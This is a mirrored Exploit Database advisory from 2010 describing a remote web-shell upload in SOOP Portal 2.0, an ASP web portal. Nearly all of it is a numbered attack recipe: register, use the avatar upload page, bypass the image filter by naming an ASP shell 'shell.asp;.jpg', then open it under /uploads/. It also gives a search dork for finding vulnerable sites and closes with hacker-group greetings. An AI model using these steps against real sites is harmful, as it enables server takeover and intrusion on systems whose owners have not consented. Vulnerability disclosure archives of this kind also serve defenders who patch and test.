SOOP Portal 2.0 – Arbitrary File Upload

• Exploit Database
• 11 阅读

• 作者： Net.Edit0r
  日期： 2010-12-05
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/15690/

• #################################################################
  # I N F O
  # Exploit Title: SOOP Portal 2.0 Remote Upload Shell Vulnerability
  # DDate: 05-12-2010
  # Author: Net.Edit0r
  # Software Link: www.soopportal.com
  # Version: 2.0
  # Tested on: windows server 2008
  # Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
  
  [~]#########################################E X P L O I T
  #############################################[~]
  #
  #1. Register On Site
  #
  #2. http://server/member_form.asp?do=5&mid=4
  #
  #3. Current avatar [ Browse/Upload ]
  #
  #4. http://server/assetman3.asp?mode=1&ffilter=image
  #
  #4. Asp renamed via the .asp;.jpg (shell.asp;.jpg)
  #
  #5. http://server/uploads/ [You can get the address at the
  See Shell Shell upload]
  #
  #6. In this section, file in the folder that you have selected in
  the previous section is placed .
  #
  #7 . Example URL : http://server/uploads/
  #
  #Dork : "SOOP Portal 2.0"
  #
  #
  [~]#########################################ThankS To ...
  ###########################################[~]
  #
  # Special Thanks To : HUrr!c4nE, Cair3x, B3hz4d, M4hd1,
  Skitt3r,Hussin-v ,Virus_Baghdad ,snIPer alBlDeat
  #
  # 7-Team: virangar, H-SK33PY , farzadho ,n3me3iz ,mmilad200 , fr0nk,
  bLaCk.bytE , Satanic2000
  #
  # BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic~ keracker ~ Mikili
  #
  [~]######################################### FinisH :D
  #############################################[~]